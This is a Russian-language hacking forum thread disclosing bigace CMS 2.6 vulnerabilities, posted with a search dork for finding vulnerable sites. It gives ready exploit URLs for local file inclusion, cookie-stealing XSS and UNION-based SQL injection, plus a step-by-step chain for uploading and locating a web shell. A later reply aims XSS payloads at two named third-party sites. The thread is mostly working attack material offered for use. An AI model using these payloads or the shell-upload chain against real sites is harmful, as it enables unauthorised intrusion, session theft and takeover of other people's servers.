HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Уязвимости bigace CMS 2.6
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости bigace CMS 2.6
  #1  
Старый 23.10.2009, 14:08
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


По умолчанию Уязвимости bigace CMS 2.6
Уязвимости bigace CMS 2.6

Product: bigace CMS
Version: 2.6
Dork: "Powered by BIGACE 2.6"
Site: www.bigace.de
Found by: Dimi4
Date: 23.10.09

Local File Inclusion
/public/index.php : 78 line

PHP код:
// PROCESSING COMMAND INTERPRETER
        $COMMAND_FILE _BIGACE_DIR_ROOT '/system/command/' $GLOBALS['_BIGACE']['PARSER']->getCommand() . '.cmd.php';
        if ( file_exists($COMMAND_FILE) )
        {
            include_once ($COMMAND_FILE); 
Need: magic_quotes_gpc = OFF


Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=[evil_file].php%00&id=tpl-frameset_tADMIN_len

Cross Site Scripting

Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=tpl-frameset_tADMIN_len%3Cscript%3Ealert(document.cookie)%3C/script%3E
При просмотре логов, сработает алерт (http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=[id])

SQL-injection
Вы скажите да нахера нам скуля, если в админке уже? Так вот, для того чтобы узнать имя нашего шелла.

system/admin/plugins/logging.php : 76 line

PHP код:
if(isset($_GET['view']))
{
    $values = array(
                    'ORDER_BY'          => '',
                    'LIMIT'             => '',
                    'WHERE_EXTENSION'   => " AND id='".$_GET['view']."'"
    );
    
    $sqlString $GLOBALS['_BIGACE']['SQL_HELPER']->loadStatement('logging_filter');
    $sqlString $GLOBALS['_BIGACE']['SQL_HELPER']->prepareStatement($sqlString$values);
    $entry $GLOBALS['_BIGACE']['SQL_HELPER']->execute($sqlString);
    $entry $entry->next(); 
Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=[id]--+
Пошаговая заливка шелла:

В админке:
1. Идем в заливку файлов. Грузим свой шелл. Проверки на расширение нет. В результате получаем ИД, запоминаем. (Например ИД=3)
2. С помощю скули получаем зашифрованое имя шелла:
Код:
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=3--+
3. Получили допустим e449d2128602875bd6c84284a3458a42_1256285544.php

Идем в
http://localhost/test/bigace_2.6/consumer/cid1/items/file/[name]
Последний раз редактировалось Jokester; 23.04.2010 в 15:45..
 
Ответить с цитированием

  #2  
Старый 23.04.2010, 15:48
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
слив РОА
 
Ответить с цитированием

  #3  
Старый 18.12.2010, 15:52
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
bigace CMS 2.6



XSS

Код:
public/index.php?cmd=application&id=">alert('xss')
Пример нескольких сайтов:

Код:
http://www.ivao.ch/ba_cms/public/index.php?cmd=application&id=">alert('за тобой выехали=)')
http://newgate-consulting.de/public/index.php?cmd=application&id=">alert('берегись')
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как определить вид CMS или форума? Validol Веб-уязвимости 1 14.09.2009 14:24
10 вещей, которые нужно учитывать при выборе идеальной CMS Andres Статьи 0 27.06.2009 02:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.